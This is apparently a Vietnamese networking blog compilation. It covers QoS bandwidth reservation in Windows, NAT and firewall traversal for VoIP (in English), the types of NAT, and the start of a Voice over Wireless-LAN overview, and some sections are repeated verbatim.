Một trong những xu hướng lớn nhất trong vấn đề kết nối mạng ngày nay là việc truyền cả tín hiệu thoại và video trên các mạng dữ liệu truyền thống. Một trong những vấn đề về việc hội tụ này là cách thực hiện như thế nào, các gói thoại và video cần phải phân phối đến người nhận một cách nhanh chóng và có độ tin cậy cao, không có độ jitter và độ trễ vượt quá giới hạn.
Một giải pháp để giải quyết vấn đề này là sử dụng QoS. QoS, hoặc Quality of Service, là một công nghệ xử lý gói ưu tiên. Về bản chất, QoS cho phép bạn xử lý các gói thông tin nhạy cảm với mức ưu tiên cao hơn các gói khác.
Đây là một chuẩn công nghiệp chứ không phải chuẩn thuộc quyền sở hữu của Microsoft. Microsoft đã lần đầu tiên giới thiệu QoS trong Windows 2000. Phiên bản QoS của Microsoft đã được phát triển dần lên từ thời điểm đó nhưng vẫn thích nghi với các chuẩn công nghiệp.
Trong Windows XP Professional, QoS làm việc chủ yếu như một cơ chế dự trữ độ rộng băng thông. Khi QoS được kích hoạt, ứng dụng được cho phép dự trữ đến 20% tổng số băng thông, băng thông này được cung cấp bởi mỗi một trong các adapter mạng. Số lượng băng thông một ứng dụng dự trữ hoàn toàn có thể điều chỉnh. Chúng tôi sẽ giới thiệu cho các bạn cách thay đổi số lượng băng thông được dự trữ trong phần 3 của loạt bài này.
Để xem cách băng thông dự trữ được sử dụng như thế nào, cho rằng bạn đã có một ứng dụng video conferencing cần đến băng thông ưu tiên cao. Thừa nhận rằng ứng dụng này đã được kích hoạt QoS, nó sẽ dự trữ 20% toàn bộ băng thông của máy, để lại 80% băng thông cho phần còn lại của lưu lượng mạng.
Các ứng dụng không phải là video conferencing sẽ sử dụng cơ chế phân phối tốt nhất. Điều này có nghĩa rằng các gói này sẽ được gửi theo cách “đến trước, phục vụ trước”. Hay nói theo cách khác, lưu lượng của của ứng dụng video conferencing sẽ có ưu tiên cao hơn so với các lưu lượng khác, tuy nhiên không bao giờ được cho phép tiêu tốn hơn 20% tổng số băng thông.
Mặc dù vậy, tuy Windows XP thiết lập băng thông dự trữ cho lưu lượng ưu tiên cao nhưng điều đó không có nghĩa rằng các ứng dụng mức ưu tiên thông thường không thể sử dụng băng thông dự trữ này. Nói theo cách khác, tuy các ứng dụng video conferencing có mức ưu tiên cao, có băng thông dự trữ, nhưng Windows vẫn cho phép các ứng dụng khác có thể sử dụng cả băng thông dự trữ và băng thông không dự trữ để đạt được mục đích phân phối hiệu quả nhất miễn là ứng dụng mà băng thông dự trữ đang không sử dụng.
Khi ứng dụng video conferencing được khởi chạy thì Windows sẽ bắt đầu công việc dự trữ của nó. Mặc dù thế, sự dự trữ lúc này không tuyệt đối. Cho là Windows đã dự trữ 20% băng thông mạng cho ứng dụng video conferencing, nhưng ứng dụng lại không cần đến tất cả 20% này. Trong trường hợp như vậy Windows sẽ cho phép các ứng dụng khác sử dụng phần băng thông còn thừa nhưng sẽ kiểm tra liên tục những nhu cầu về băng thông của ứng dụng với mức ưu tiên cao. Nếu ứng dụng cần đến nhiều băng thông thì băng thông sẽ được gán cho nó, có thể lên đến toàn bộ 20%.
Như những gì chúng tôi đã đề cập ở trên, QoS là một chuẩn công nghiệp chứ không phải là các công nghệ thuộc quyền sở hữu của Microsoft. Chính vì vậy, QoS được thi hành bên trong Windows, nhưng Windows không thể tự thực hiện. Để cho QoS làm việc, mỗi thành phần phần cứng giữa người gửi và người nhận đều phải hỗ trợ QoS. Điều này có nghĩa rằng các NIC, switch, router và những thứ có liên quan phải nhận biết về QoS.
Trong trường hợp còn đang phân vân, bạn không phải thực thi một số hành động không cần thiết để sử dụng QoS. Asynchronous Transfer Mode (ATM) là một công nghệ kết nối mạng lý tưởng để sử dụng với QoS vì nó là một công nghệ hướng kết nối, tuy nhiên bạn cũng có thể sử dụng QoS với các công nghệ khác như Frame Relay, Ethernet hay thậm chí Wi-FI (802.11x).
Lý do tại sao ATM lại là một sự lựa chọn lý tưởng cho QoS là vì nó có khả năng thực thi dự trữ băng thông và phân phối tài nguyên dựa trên mức phần cứng. Tuy các kiểu phân phối tài nguyên này lại nằm ngoài những khả năng của Etherrnet và các công nghệ kết nối mạng tương tự, nhưng điều đó không có nghĩa rằng QoS không thể được sử dụng mà có nghĩa rằng, nó phải được thực thi trong môi trường ATM.
Trong môi trường ATM các tài nguyên được phân chia hoàn toàn động (on the fly) ở mức phần cứng. Do Ethernet và các công nghệ tương tự nó không thể phân chia tài nguyên theo cách này, các kiểu công nghệ của nó dựa trên sự ưu tiên thay cho việc phân chia động. Điều này có nghĩa là sự dự trữ băng thông xảy ra ở mức cao hơn bên trong mô hình OSI. Khi băng thông được dự trữ, các gói có mức ưu tiên cao hơn sẽ được truyền đi trước.
Một thứ quan trọng cần phải lưu ý ở đây khi xem xét về việc thực thi QoS trên Ethernet, Wi-Fi, hoặc trên các mạng tương tự là ở chỗ các công nghệ này không có tính kết nối. Điều đó có nghĩa rằng người gửi không thể kiểm tra trạng thái của người nhận hoặc trạng thái của mạng giữa người gửi và người nhận. Điều này cũng có nghĩa rằng người gửi có thể bảo đảm rằng các gói ưu tiên cao hơn sẽ được truyền trước gói ưu tiên thấp hơn, nhưng không thể bảo đảm được rằng các gói sẽ đến người nhận trong một số lượng thời gian cụ thể. Ngược lại, QoS lại có khả năng bảo đảm cho vấn đề này trên các mạng ATM vì ATM là công nghệ hướng kết nối.
Windows 2000 và Windows Server 2003
Như chúng tôi đã đề cập từ trước rằng Microsoft đã giới thiệu lần đầu tiên về QoS là trong Windows 2000, và sự thực thi QoS của Microsoft đó đã được phát triển đáng kể từ thời điểm đó. Chính vì vậy có một đôi chút khác biệt giữa QoS trong Windows 2000, Windows XP và Windows Server 2003.
Sự thực thi của QoS trên Windows 2000 được dựa trên kiến trúc Intserv, đây là kiến trúc không được hỗ trợ trong Windows XP hoặc Windows Server 2003. Lý do tại sao Microsoft không sử dụng kiến trúc này nữa là vì các API cơ sở rất khó sử dụng và kiến trúc có nhiều vấn đề trong khi mở rộng.
Một số tổ chức vẫn sử dụng Windows 2000, chính vì vậy chúng tôi muốn giới thiệu một chút thông tin về kiến trúc QoS của Windows 2000 làm việc như thế nào. Windows 2000 sử dụng một giao thức có tên gọi RSVP để dự trữ tài nguyên băng thông. Khi băng thông được yêu cầu, Windows sẽ chỉ định thời điểm các gói được gửi đi. Để thực hiện được điều đó, Windows 2000 đã sư dụng một giao thức tín hiệu có tên gọi là SBM (Sunbelt Bandwidth manager) nhằm thông báo cho người gửi biết rằng các gói đã sẵn sàng bên phía nhận. Admission Control Service (ACS) sẽ thẩm định băng thông có đủ khả năng hiện có và sau đó sẽ cho phép hoặc từ chối yêu cầu về băng thông.
Toàn bộ quá trình có một chút phức tạp hơn những gì ở trên, nhưng đó là một số phần chính mà Windows 2000 khác với Windows Server 2003 và Windows XP. Còn lại Windows 2000, 2003 và XP đều sử dụng các cơ chế điều khiển lưu lượng giống nhau. Về phần các cơ chế này chúng tôi sẽ giới thiệu cho các bạn trong phần 2.
Kết luận
Trong phần một này chúng tôi đã giới thiệu cho các bạn các gói mang thông tin thoại và video phải được phân phối với tốc độ nhanh hơn các gói dữ liệu thông thường để tránh tình trạng jitter. Chúng tôi cũng đã giải thích về các công nghệ QoS có thể được sử dụng như thế nào để giúp bảo vệ lưu lượng thoại và video được phân phối một cách hiệu quả. Trong phần 2 của loạt bài này chúng tôi sẽ giải thích về cách làm việc của QoS.
Thứ Hai, 16 tháng 9, 2013
The NAT and Firewall Traversal Problem for VoIP
(from voip.com.vn)
The NAT and Firewall Traversal Problem
for VoIP
Figure 1 illustrates the NAT and firewall traversal problem for VoIP. Home users connect to the Internet using broadband routers from various vendors, such as Belkin, D-Link, LinkSys and NetGear. Users connect using wireless hotspots at Internet cafes or hotels, which also use routers from vendors, such as NetGear and SonicWall. Also, business users connect to the Internet using firewall products such as Cisco PIX, Juniper NetScreen, and CheckPoint FW1. Businesses sometimes also set up web-proxies such as Squid or Microsoft ISA for accessing the Web by their employees. Now suppose all the users behind all of these NAT and firewall devices/solutions want to make VoIP calls between each other. Will all of these calls work using traditional VoIP technologies? The answer is no. Most VoIP calls will not work through these NATs and firewalls. This is referred to as the NAT and firewall traversal problem - or simply the NAT traversal problem.
Figure 1: Broadband users connect to Internet using a plethora of NATs and firewalls. For widespread adoption, VoIP calls needs to work through them seamlessly.
Recently, there have been a lot of mobile phone products with Wi-Fi VoIP features (single-mode Wi-Fi or dual mode cellular plus Wi-Fi). According to Infonetics Research, the number of Wi-Fi phones would double or triple each year until 2009 reaching a worldwide market of $3.7 billion [12]. Now suppose a lot of users have these Wi-Fi phones, and they move around with these phones to use them from wherever they are - at homes, Internet cafes and offices. They will not only face the same NAT traversal problem, but worse, their connections and their network configurations, may change frequently. This further emphasizes the NAT traversal problem as it will severely limit users capability to communicate.
The NAT/Firewall Traversal Challenge
Homes and businesses are increasingly installing intermediary devices between their computer and their Internet connections. These devices - usually a router - provide a number of capabilities, with the most common being that of a NAT and/or a firewall.
NAT traversal is complicated by many contributing factors:
NATs break VoIP protocols
The idea of a NAT is to allow several devices to share a single public IP address. Figure 2a shows how a router connects several computers using private IP addresses to the Internet using a single public IP address. The router allows the computers to access the public Internet by modifying each IP packet to and from these computers by using a two-way mapping between private IP addresses and transport ports to the router's public IP address and transport ports. The rewriting of addresses by the NAT is usually performed using a lookup table, where mappings between internal address/port pairs and external address/port pairs are stored.
This technique facilitates sharing a single public IP address among many computers that use private IP addresses. However, this technique imposes a few problems for VoIP calls. Figure 2b shows the problem when Carol makes a VoIP call using SIP from behind her NAT device. To establish the call, Carol needs to share the IP address and a UDP transport port where she will receive voice data. However when Carol uses the private IP address and local UDP port to receive voice for the SIP call, voice packets from the remote party connected to public Internet will never reach Carol because private IP addresses are not routable in the public Internet.
Another property of NATs is that the port mapping is kept only if there is traffic in both directions. For example, if Carol is in a call with Ellen, and for a while only Ellen talks (i.e. Carol does not send any packets to Ellen), then Carol's NAT may close the mapping, which effectively terminates the call.
Firewalls do not allow uninvited packets and close inactive connections
The main purpose of a firewall is to protect an internal network from unauthorized access by entities on external networks. Firewalls normally allow incoming traffic from external hosts only if the session was initiated from the internal network. Therefore, incoming calls, coming from un-trusted external sources, are filtered out by the firewall, and the application fails to establish connection between the end users. Firewalls are not only present in most routers, but are also available in most modern operating systems (e.g. Windows firewall in Windows XP).
Figure 2 shows the problem as described above. The firewall allows media from Ellen to reach Carol, because Carol initiated the call. However, the incoming call from Dave could not pass through the firewall, as no data packets were sent to Dave from Carol. Therefore, the call between Carol and Dave fails to establish. A firewall can, however, be configured in any number of ways, such as only allowing TCP traffic out to the public Internet and preventing the use of UDP.
Cascaded NATs
NAT configuration may be cascaded which adds one or more levels of complexity to the problem. In this scenario, one router is connected to the Internet using public IP addresses, and provides a private IP address to a second set of routers. Each of the second set of routers may itself provide separate private IP addresses to one or more hosts. For VoIP, the challenge is for any host connecting to any of these routers may call each other, or it may also call any other host in the public Internet (or behind yet another router in another location).
UPnP gateways expect application control
Sometimes residential routers expect application control using the UPnP protocol to access the Internet. If UPnP is enabled on a router, which is the default case for many Asian countries such as Japan and Korea, the VoIP application needs to speak the UPnP protocol with the device to enable sending/receiving of data to/from the Internet.
Enterprise firewalls block UDP and sometimes enforce web-proxies
Most businesses or enterprises use strong firewall rules where UDP is usually blocked. Thus all communications need to use TCP transport. In some cases only Internet communications that these businesses allow is browsing the Internet through some web-proxies (such as Squid or Microsoft ISA). In such environments, VoIP calls cannot use UDP, and therefore need to use TCP transport or HTTP-tunneling.
Figure 2: The NAT traversal challenge
While NATs/firewalls play a very important role in securing and enhancing the usability of an internal network, they impose a significant problem in setting up VoIP calls between end users. Application developers cannot make assumptions about how traffic can pass into or out of these private networks.
The NAT and Firewall Traversal Problem
for VoIP
Figure 1 illustrates the NAT and firewall traversal problem for VoIP. Home users connect to the Internet using broadband routers from various vendors, such as Belkin, D-Link, LinkSys and NetGear. Users connect using wireless hotspots at Internet cafes or hotels, which also use routers from vendors, such as NetGear and SonicWall. Also, business users connect to the Internet using firewall products such as Cisco PIX, Juniper NetScreen, and CheckPoint FW1. Businesses sometimes also set up web-proxies such as Squid or Microsoft ISA for accessing the Web by their employees. Now suppose all the users behind all of these NAT and firewall devices/solutions want to make VoIP calls between each other. Will all of these calls work using traditional VoIP technologies? The answer is no. Most VoIP calls will not work through these NATs and firewalls. This is referred to as the NAT and firewall traversal problem - or simply the NAT traversal problem.
Figure 1: Broadband users connect to Internet using a plethora of NATs and firewalls. For widespread adoption, VoIP calls needs to work through them seamlessly.
Recently, there have been a lot of mobile phone products with Wi-Fi VoIP features (single-mode Wi-Fi or dual mode cellular plus Wi-Fi). According to Infonetics Research, the number of Wi-Fi phones would double or triple each year until 2009 reaching a worldwide market of $3.7 billion [12]. Now suppose a lot of users have these Wi-Fi phones, and they move around with these phones to use them from wherever they are - at homes, Internet cafes and offices. They will not only face the same NAT traversal problem, but worse, their connections and their network configurations, may change frequently. This further emphasizes the NAT traversal problem as it will severely limit users capability to communicate.
The NAT/Firewall Traversal Challenge
Homes and businesses are increasingly installing intermediary devices between their computer and their Internet connections. These devices - usually a router - provide a number of capabilities, with the most common being that of a NAT and/or a firewall.
NAT traversal is complicated by many contributing factors:
NATs break VoIP protocols
The idea of a NAT is to allow several devices to share a single public IP address. Figure 2a shows how a router connects several computers using private IP addresses to the Internet using a single public IP address. The router allows the computers to access the public Internet by modifying each IP packet to and from these computers by using a two-way mapping between private IP addresses and transport ports to the router's public IP address and transport ports. The rewriting of addresses by the NAT is usually performed using a lookup table, where mappings between internal address/port pairs and external address/port pairs are stored.
This technique facilitates sharing a single public IP address among many computers that use private IP addresses. However, this technique imposes a few problems for VoIP calls. Figure 2b shows the problem when Carol makes a VoIP call using SIP from behind her NAT device. To establish the call, Carol needs to share the IP address and a UDP transport port where she will receive voice data. However when Carol uses the private IP address and local UDP port to receive voice for the SIP call, voice packets from the remote party connected to public Internet will never reach Carol because private IP addresses are not routable in the public Internet.
Another property of NATs is that the port mapping is kept only if there is traffic in both directions. For example, if Carol is in a call with Ellen, and for a while only Ellen talks (i.e. Carol does not send any packets to Ellen), then Carol's NAT may close the mapping, which effectively terminates the call.
Firewalls do not allow uninvited packets and close inactive connections
The main purpose of a firewall is to protect an internal network from unauthorized access by entities on external networks. Firewalls normally allow incoming traffic from external hosts only if the session was initiated from the internal network. Therefore, incoming calls, coming from un-trusted external sources, are filtered out by the firewall, and the application fails to establish connection between the end users. Firewalls are not only present in most routers, but are also available in most modern operating systems (e.g. Windows firewall in Windows XP).
Figure 2 shows the problem as described above. The firewall allows media from Ellen to reach Carol, because Carol initiated the call. However, the incoming call from Dave could not pass through the firewall, as no data packets were sent to Dave from Carol. Therefore, the call between Carol and Dave fails to establish. A firewall can, however, be configured in any number of ways, such as only allowing TCP traffic out to the public Internet and preventing the use of UDP.
Cascaded NATs
NAT configuration may be cascaded which adds one or more levels of complexity to the problem. In this scenario, one router is connected to the Internet using public IP addresses, and provides a private IP address to a second set of routers. Each of the second set of routers may itself provide separate private IP addresses to one or more hosts. For VoIP, the challenge is for any host connecting to any of these routers may call each other, or it may also call any other host in the public Internet (or behind yet another router in another location).
UPnP gateways expect application control
Sometimes residential routers expect application control using the UPnP protocol to access the Internet. If UPnP is enabled on a router, which is the default case for many Asian countries such as Japan and Korea, the VoIP application needs to speak the UPnP protocol with the device to enable sending/receiving of data to/from the Internet.
Enterprise firewalls block UDP and sometimes enforce web-proxies
Most businesses or enterprises use strong firewall rules where UDP is usually blocked. Thus all communications need to use TCP transport. In some cases only Internet communications that these businesses allow is browsing the Internet through some web-proxies (such as Squid or Microsoft ISA). In such environments, VoIP calls cannot use UDP, and therefore need to use TCP transport or HTTP-tunneling.
Figure 2: The NAT traversal challenge
While NATs/firewalls play a very important role in securing and enhancing the usability of an internal network, they impose a significant problem in setting up VoIP calls between end users. Application developers cannot make assumptions about how traffic can pass into or out of these private networks.
Khái niệm căn bản về NAT:
Khái niệm căn bản về NAT:
NAT (Network Address Translation), là một cơ chế dịch đổi địa chỉ mạng được cài đặt trong một bộ định tuyến. Trong mạng máy tính, khi một máy con thực hiện kết nối hoặc gởi dữ liệu tới một máy tính nào đó trên internet, dữ liệu sẽ được gởi tới NAT, sau đó NAT sẽ thay thế địa chỉ IP riêng của máy con đó rồi gửi gói dữ liệu đi với địa chỉ IP của NAT. NAT ghi lại bảng thông tin của những máy tính đã gởi những gói tin đi ra ngoài trên mỗi cổng dịch vụ và gởi những gói tin nhận được về đúng máy tính đó. Ngoài ra cơ chế NAT cùng được dùng để kết nối giữa hai mạng IPv4 và IPv6.
I. Khái quát về NAT
NAT hay còn gọi là Network Address Translation là một kĩ thuật được phát minh lúc khởi đầu dùng để giải quyết vấn đề IP shortage, nhưng dần dần nó chứng tỏ nhiều ưu điểm mà lúc phát minh ra nó người ta không nghĩ tới, một trong những lợi điểm của NAT ngày nay được ứng dụng nhiều nhất là NAT cho phép
- Chia sẽ kết nối internet với nhiều máy bên trong LAN với một địa chỉ IP của WAN
- Một lợi điểm nữa của NAT là nó có thể làm việc như một Firewall, nó giúp dấu tất cả IP bên trong LAN với thế giới bên ngoài, tránh sự dòm ngó của hackers.
- Tính linh hoạt và sự dễ dàng trong việc quản lý
NAT giúp cho các home user và các doanh nghiệp nhỏ có thể tạo kết nối với internet một cách dễ dàng và hiệu quả cũng như giúp tiết kiệm vốn đầu tư.
NAT cũng có nhiều loại hay hình thức khác nhau, chúng ta sẽ nói sơ lược qua các dạng NAT
1. Static NAT
Với static NAT thì sự chuyển đổi packet giữa hai network, giữa nguồn và địa chỉ đến trở nên đơn giản và nhất định, các điều kiện về trạng thái kết nối không cần phải giử lại. Nó chỉ cần nhìn vào mỗi IP packet khi chuyển đổi, các thông tin về mapping đều không cần thiết. Static NAT sử dụng khi số lượng IP trong LAN bằng số lượng NAT-IP.
Các bạn có thể tham khảo hình sau đây về cấu hình static NAT.
2. Dynamic NAT
Dynamic NAT khác với static là các địa chỉ host IP được thay đổi liên tục mỗi lần tạo kết nối ra ngoài các host này sẽ nhận được một địa chỉ NAT-IP và mỗi lần như vậy NAT sẽ giữ lại thông tin IP của host này trong NAT Table của nó và cứ như thế. Tuy nhiên cái bất lợi của dynamic NAT là khi NAT-IP được cung cấp hết do cùng một lúc có nhiều host rong LAN gởi yêu cầu thì lập tức sẽ không còn bất kì một kết nối nào được chuyển dịch nữa qua NAT vì NAT-IP đã được cấp phát hết và như vậy nó phải đợi tới lần kết nối sau.
Các bạn có thể tham khảo hình sau đây để có thể hiểu cách làm việc của Dynamic NAT NAT rule: Dynamic translate tất cả IP thuộc class B 138.201 đến một địa chỉ thuộc class C 178.201. Mỗi một kết nối từ bên trong muốn ra ngoài sẽ được NAT cung cấp một địa chỉ trong số lượng IP sẳn có của NAT, nếu các NAT-IP này được cấp phát hết thì các connection từ class B sẽ không thể ra ngoài được nữa.
3. NAT ngụy trang hay giả lập (Masquerading)
Đây là dạng NAT phổ thông mà chúng ta thường gặp và sử dụng ngày nay trong các thiết bị phần cứng hay phần mềm routing như router hay các phần mềm chia sẽ internet như ISA, ICS hay NAT server mà lát nữa đây chúng ta sẽ có dịp tìm hiểu cách thiết lập nó.
Dạng NAT này hay còn được gọi với một cái tên NPAT (Network Port Address Translation), với dạng NAT này tất cả các IP trong mạng LAN được dấu dưới một địa chỉ NAT-IP, các kết nối ra bên ngoài đều được tạo ra giả tạo tại NAT trước khi nó đến được địa chỉ internet.
Các bạn có thể tham khảo hình dưới đây để tìm hiểu cách làm việc của NAPT
NAT rule: Giả trang internet IP address 138.201 sử dụng địa chỉ NAT router
Cho mỗi packets được gởi ra ngoài IP nguồn sẽ được thay thế bằng NAT-IP là 195.112 và port nguồn được thay thế bằng một cổng nào đó chưa được dùng ở NAT, thông thường là các cổng lớn hơn 1204.
Nếu một packet được gởi đến địa chỉ của router và port của destination nằm trong khoảng port dùng để masquerading thì NAT sẽ kiểm tra địa chỉ IP này và port với masquerading table của NAT nếu là gởi cho một host bên trong LAN thì gói tin này sẽ được NAT gắn vào địa chỉ IP và port của host đó và sẽ chuyển nó đến host đó.
Trích từ http://phuongpham2205.aimoo.com/C-c-kh-i-ni-m-c-b-n/Kh-i-ni-m-NAT-1-154986.html
NAT (Network Address Translation), là một cơ chế dịch đổi địa chỉ mạng được cài đặt trong một bộ định tuyến. Trong mạng máy tính, khi một máy con thực hiện kết nối hoặc gởi dữ liệu tới một máy tính nào đó trên internet, dữ liệu sẽ được gởi tới NAT, sau đó NAT sẽ thay thế địa chỉ IP riêng của máy con đó rồi gửi gói dữ liệu đi với địa chỉ IP của NAT. NAT ghi lại bảng thông tin của những máy tính đã gởi những gói tin đi ra ngoài trên mỗi cổng dịch vụ và gởi những gói tin nhận được về đúng máy tính đó. Ngoài ra cơ chế NAT cùng được dùng để kết nối giữa hai mạng IPv4 và IPv6.
I. Khái quát về NAT
NAT hay còn gọi là Network Address Translation là một kĩ thuật được phát minh lúc khởi đầu dùng để giải quyết vấn đề IP shortage, nhưng dần dần nó chứng tỏ nhiều ưu điểm mà lúc phát minh ra nó người ta không nghĩ tới, một trong những lợi điểm của NAT ngày nay được ứng dụng nhiều nhất là NAT cho phép
- Chia sẽ kết nối internet với nhiều máy bên trong LAN với một địa chỉ IP của WAN
- Một lợi điểm nữa của NAT là nó có thể làm việc như một Firewall, nó giúp dấu tất cả IP bên trong LAN với thế giới bên ngoài, tránh sự dòm ngó của hackers.
- Tính linh hoạt và sự dễ dàng trong việc quản lý
NAT giúp cho các home user và các doanh nghiệp nhỏ có thể tạo kết nối với internet một cách dễ dàng và hiệu quả cũng như giúp tiết kiệm vốn đầu tư.
NAT cũng có nhiều loại hay hình thức khác nhau, chúng ta sẽ nói sơ lược qua các dạng NAT
1. Static NAT
Với static NAT thì sự chuyển đổi packet giữa hai network, giữa nguồn và địa chỉ đến trở nên đơn giản và nhất định, các điều kiện về trạng thái kết nối không cần phải giử lại. Nó chỉ cần nhìn vào mỗi IP packet khi chuyển đổi, các thông tin về mapping đều không cần thiết. Static NAT sử dụng khi số lượng IP trong LAN bằng số lượng NAT-IP.
Các bạn có thể tham khảo hình sau đây về cấu hình static NAT.
2. Dynamic NAT
Dynamic NAT khác với static là các địa chỉ host IP được thay đổi liên tục mỗi lần tạo kết nối ra ngoài các host này sẽ nhận được một địa chỉ NAT-IP và mỗi lần như vậy NAT sẽ giữ lại thông tin IP của host này trong NAT Table của nó và cứ như thế. Tuy nhiên cái bất lợi của dynamic NAT là khi NAT-IP được cung cấp hết do cùng một lúc có nhiều host rong LAN gởi yêu cầu thì lập tức sẽ không còn bất kì một kết nối nào được chuyển dịch nữa qua NAT vì NAT-IP đã được cấp phát hết và như vậy nó phải đợi tới lần kết nối sau.
Các bạn có thể tham khảo hình sau đây để có thể hiểu cách làm việc của Dynamic NAT NAT rule: Dynamic translate tất cả IP thuộc class B 138.201 đến một địa chỉ thuộc class C 178.201. Mỗi một kết nối từ bên trong muốn ra ngoài sẽ được NAT cung cấp một địa chỉ trong số lượng IP sẳn có của NAT, nếu các NAT-IP này được cấp phát hết thì các connection từ class B sẽ không thể ra ngoài được nữa.
3. NAT ngụy trang hay giả lập (Masquerading)
Đây là dạng NAT phổ thông mà chúng ta thường gặp và sử dụng ngày nay trong các thiết bị phần cứng hay phần mềm routing như router hay các phần mềm chia sẽ internet như ISA, ICS hay NAT server mà lát nữa đây chúng ta sẽ có dịp tìm hiểu cách thiết lập nó.
Dạng NAT này hay còn được gọi với một cái tên NPAT (Network Port Address Translation), với dạng NAT này tất cả các IP trong mạng LAN được dấu dưới một địa chỉ NAT-IP, các kết nối ra bên ngoài đều được tạo ra giả tạo tại NAT trước khi nó đến được địa chỉ internet.
Các bạn có thể tham khảo hình dưới đây để tìm hiểu cách làm việc của NAPT
NAT rule: Giả trang internet IP address 138.201 sử dụng địa chỉ NAT router
Cho mỗi packets được gởi ra ngoài IP nguồn sẽ được thay thế bằng NAT-IP là 195.112 và port nguồn được thay thế bằng một cổng nào đó chưa được dùng ở NAT, thông thường là các cổng lớn hơn 1204.
Nếu một packet được gởi đến địa chỉ của router và port của destination nằm trong khoảng port dùng để masquerading thì NAT sẽ kiểm tra địa chỉ IP này và port với masquerading table của NAT nếu là gởi cho một host bên trong LAN thì gói tin này sẽ được NAT gắn vào địa chỉ IP và port của host đó và sẽ chuyển nó đến host đó.
Trích từ http://phuongpham2205.aimoo.com/C-c-kh-i-ni-m-c-b-n/Kh-i-ni-m-NAT-1-154986.html
VOICE OVER WIRELESS-LAN
Chương 1: TỔNG QUAN VOICE OVER WIRELESS-LAN
Hệ thống Voice over Wireless-LAN (VoWLAN) là một sự mở rộng của hệ thống VoIP có dây thông thường, nói cách khác, VoWLAN là công nghệ truyền thoại qua môi trường không dây dựa trên giao thức IP. Khi hạ tầng mạng phát triển, WLAN hoàn thiện, nhu cầu di động của người dùng tăng cao, VoWLAN bắt đầu được quan tâm.
1.1. Ứng dụng của VoWLAN
1.1.1. Hệ thống phân phối hay các xí nghiệp sản xuất
Đây chính là một trong những nơi ứng dụng đầu tiên của công nghệ WLAN do tính chất rất khó cài đặt dây cáp mạng LAN thông thường đồng thời lại yêu cầu tính di động tương đối cao. Các kho hàng là nơi đầu tiên dùng WLAN cho mục đích thu thập dữ liệu bằng việc sử dụng máy quét mã vạch. Bên cạnh chức năng cơ bản đó, ngày nay, hầu hết các thiết bị này đều tích hợp thêm chức năng thoại, điển hình là phương thức thoại Push-to-talk.
1.1.2. Trung tâm chăm sóc sức khỏe hay các bệnh viện
Cung cấp khả năng di động cho người sử dụng đầu cuối, đó chính là ưu điểm nổi trội để WLAN nói riêng hay VoWLAN nói chung được chấp nhận trong môi trường khách hàng là các trung tâm chăm sóc sức khỏe. Phạm vi ứng dụng của WLAN trong khu vực này là rất phong phú, từ việc thu thập thông tin về sức khỏe của bệnh nhân đến việc xác định vị trí và trạng thái của các giường cấp cứu. VoWLAN được sử dụng cho mục đích chăm sóc bệnh nhân tốt hơn dành cho các y tá, hay phục vụ mục đích trao đổi thông tin giữa bác sĩ và y tá hay các nhóm làm việc với nhau.
1.1.3. Khách sạn, sân bay, nhà ga, …
Trong các khu vực này, công nghệ wifi thường được sử dụng thay thế cho các đường dây truy nhập ADSL. Khách hàng sẽ có cảm giác tiện dụng hơn khi truy nhập Internet thông qua laptop hay các thiết bị cầm tay tới các AP hơn là phải cắm trực tiếp vào cổng Ethernet thông thường. Việc triển khai cáp mạng ở những nơi như thế này là rất khó khăn và phức tạp. Bên cạnh việc sử dụng mạng WLAN để truyền dữ liệu, chúng ta hoàn toàn có thể cài đặt dịch vụ VoWLAN nhằm tiết kiệm chi phí và đảm bảo một hệ thống đồng bộ, dễ dàng cho công việc quản lý hơn.
1.1.4. Khu vực các trường đại học
Ngày nay, nhu cầu về truy nhập không dây trong các trường đại học là rất lớn. Khách hàng chủ yếu ở đây chính là tầng lớp sinh viên có nhu cầu truy nhập vào các nguồn tài nguyên phục vụ cho công tác nghiên cứu, học tập của nhà trường. Bên cạnh đó, đây cũng chính là thị trường đầy tiềm năng cho VoWLAN phát triển do giá thành rẻ, chất lượng dịch vụ ở mức độ chấp nhận được đối với tầng lớp sinh viên.
1.1.5. Hộ gia đình
Theo thống kê, thiết bị mạng gia đình chiếm khoảng 50% trong tổng số tất cả các sản phẩm WLAN được bán ra trên thị trường. Thực tế, thiết bị đầu cuối VoWLAN thường không được khách hàng sử dụng phổ biến do phải đầu tư thêm chi phí. Thay vào đó, họ chọn cách thức cài đặt phần mềm trên các thiết bị trung gian như điện thoại đa chế độ cầm tay hay laptop có hỗ trợ chức năng thoại. Thường thì với quy mô hộ gia đình, tín hiệu thoại sẽ được đối xử như các loại tín hiệu khác, không có sự cấu hình ưu tiên về lưu lượng hay các yêu cầu về chất lượng tương tư. Nhưng bù lại, việc trao đổi thông tin, chiếm dụng tài nguyên lại rất dễ được kiểm soát do quy mô nhỏ.
1.1.6. Hot Spot và các WISP
Các WISP ngoài việc cung cấp truy nhập không dây thông thường cho người sử dụng, họ còn có thể hỗ trợ thêm về dịch vụ thoại. Việc hỗ trợ thêm này hoàn toàn không bắt buộc đối với các WISP song để cạnh tranh họ thường giới thiệu khả năng này vào mạng lưới của mình. Tương tự với các Hot Spot cũng vậy.
1.1.7. Mạng WMAN topo lưới
Mạng WMAN hiện đang được triển khai ở nhiều nơi trên thế giới. Ví dụ như thủ đô London của nước Anh đã công bố phủ sóng 100% tín hiệu wifi trong toàn thành phố. Để có thể truy nhập vào mạng lưới, người sử dụng phải trả một khoảng phí theo hình thức tính theo giờ, theo dung lượng hoặc thuê bao tháng. Việc triển khai WMAN mang lại mức độ tiện dụng cao và nhiều lợi ích to lớn.
Phần tiếp theo "1.2. Các thành phần của hệ thống VoWLAN"
1.2. Các thành phần của hệ thống VoWLAN
Hình 1.1. Các thành phần chính của hệ thống VoWLAN
Wireless IP Phone: thiết bị này tương tự như một chiếc điện thoại cầm tay thông thường, tuy nhiên nó được tích hợp wireless LAN adapter để liên kết với hệ thống mạng điện thoại. Người dùng có thể gọi đến người dùng khác giống như một hệ thống điện thoại văn phòng, hoặc gọi ra ngoài thông qua mạng PSTN. Ngoài ra, wireless IP phone còn có thể là một phần mềm được cài đặt trên máy tính có giao tiếp wireless LAN (softphone).
Call manager: Call manager trong một hệ thống mạng VoWLAN thay thế vị trí của private branch exchange (PBX) truyền thống. Nó xử lý các cuộc gọi trong mạng và quản lý các chức năng như đăng ký IP phone, quản trị hoạch định việc quay số và định tuyến, và quản lý thư thoại.
